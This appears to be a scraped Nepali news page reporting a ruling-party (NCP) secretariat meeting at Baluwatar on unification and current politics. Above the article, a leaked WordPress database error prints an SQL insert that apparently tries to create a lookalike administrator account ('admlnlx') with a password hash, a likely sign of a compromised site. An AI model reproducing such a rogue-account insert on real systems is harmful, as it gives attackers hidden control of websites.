WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BmOmgIwmbFbX6ZYc9UGc/ZTRRekigK/', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-05 02:22:31', '', 'admlnlx', 'admlnlx')
गाउँले न्यूज, ७ असार, काठमाडौं । सत्तारुढ नेपाल कम्युनिस्ट पार्टी (नेकपा) को सचिवालय बैठक आज बस्ने भएको छ ।
आज ३ बजेपछि प्रधानमन्त्री निवास, बालुवाटारमा बस्ने बैठकमा (नेकपा)को सांगठनिक एकता प्रक्रिया, समसामयिक राजनीतिलगायत विषयमा छलफल हुने नेकपा श्रोतले जनाएको छ ।
तत्कालीन एमाले र माओवादी केन्द्र मिलेर नेकपा गठन भए पनि जिल्ला एकीकरण भखरै मात्र सकिएको छ ।
पछिल्लो समय नेकपा नेतृत्वको सरकारले संसद्मा पेश गरेको विधेयक तथा कार्यशैलीका कारण आलोचित बनिरहेको छ । बैठकमा सरकारको काम–कारवाहीलगायत समसामयिक विषयमा पनि छलफल हुने नेकपा श्रोतले जनाएको छ ।